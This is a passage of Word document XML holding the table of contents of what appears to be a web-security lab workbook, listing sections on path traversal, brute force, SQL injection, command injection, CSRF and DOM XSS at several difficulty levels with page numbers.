          <w:hyperlink w:anchor="_Toc115553328" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Path Traversal (2.1)</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553328 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="33066410" w14:textId="17599CC0" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553329" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Brute Force</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553329 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="17398C03" w14:textId="73CADDE8" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553330" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Brute Force – Low level</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553330 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="15BD0C89" w14:textId="1EE3D737" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553331" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQL injection (3.1)</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553331 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="10969527" w14:textId="150A7D92" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553332" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQLi – Low level</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553332 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7BE4A12D" w14:textId="7073CA65" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553333" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQLi – Medium level</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553333 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D083B67" w14:textId="26176952" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553334" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQLi – Online Challenges</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553334 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0FDBA23B" w14:textId="187CA4AA" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553335" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Command Injection (2.1)</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553335 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>43</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="77EB73AB" w14:textId="222C3E37" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553336" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Command Injection – Low level</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553336 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>43</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1EC156D7" w14:textId="263D6ED2" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553337" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Command Injection – Medium level</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553337 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>45</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A2D4959" w14:textId="40410A01" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553338" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CSRF (4.1)</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553338 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>47</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3663D3F8" w14:textId="0554B71C" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553339" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CSRF – Low Level</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553339 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>47</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2EC795A8" w14:textId="3ABCB403" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553340" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS DOM (4.1)</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553340 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>48</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39C5093A" w14:textId="5627B7A8" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553341" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS DOM – Low Level</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553341 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>48</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="56FFBC94" w14:textId="720AF78F" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553342" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS DOM – Medium Level</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553342 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>49</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2BF250AF" w14:textId="430B7AD1" w:rsidR="004E2155" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115553343" w:history="1">
            <w:r w:rsidR="004E2155" w:rsidRPr="00080743">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS DOM – High Level</w:t>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115553343 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="004E2155">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
